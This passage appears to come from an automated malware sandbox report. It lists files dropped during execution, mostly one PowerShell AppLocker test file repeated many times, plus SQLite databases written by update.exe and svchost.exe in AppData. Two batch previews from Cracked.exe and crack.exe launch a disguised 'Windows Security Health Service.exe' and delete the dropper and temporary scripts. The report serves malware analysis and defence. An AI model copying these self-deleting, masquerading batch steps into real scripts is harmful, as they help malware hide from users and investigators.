                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):177
                                                  Entropy (8bit):5.15061698111028
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC59KeAHXZfRX2ypLvmqRDUkh4E2J5xAInTRIKWVgHVk:hWKqTtT69aZ5+XXpLvmq1923fTrWVCVk
                                                  MD5:2437D4A6CD70F079877E9E15FA3EB7E8
                                                  SHA1:1FDFFF4DCF7B9588B8F2A426CA955097699B6D36
                                                  SHA-256:ECA836856E1FCBDE41622507C81628ED3ADEB873460A2BA126C48AA21927AA83
                                                  SHA-512:00AA6D33BB28DBD3369EE9D8233D1E530BA21D9B22CAB75B77B9B38B07017DF279B9B7BED9384B437B8BD4D4A3A15C9AF60CAE0CBE5E6B15A29B813E26F31D06
                                                  Malicious:false
                                                  Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE306.tmp.bat" /f /q..
                                                  Process:C:\Users\user\AppData\Roaming\crack.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):153
                                                  Entropy (8bit):4.938847506633469
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDCMNtF9covO9GXvJdAQDwU1hoZDUkh4E2J5xAInajDUkh4E2J5xAIPAbBQty:hWK3aoW9GfT9DNoN923faP923fPc
                                                  MD5:0CE8B692F9CE46B028C9049DC0389FB7
                                                  SHA1:B3F7AD6BD3479ADB8A19FEB0DD3D2703568D89B5
                                                  SHA-256:9D66025B587E9823B79D972966FC5184E64E42D724638B133881F4131AEA1991
                                                  SHA-512:486603B622D766710BC74329129789E8B6B995CABE9F618014DE039AFFF9A5E237407596C2D5D3DFA891F4E31A38E83547BF31F74B6161697E09DCB180BB9474
                                                  Malicious:false
                                                  Preview:@echo off..timeout 4 > NUL..DEL "crack.exe" /f /q..CDC:\Users\user\AppData\Local\Temp\..DEL"C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd" /f /q..
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
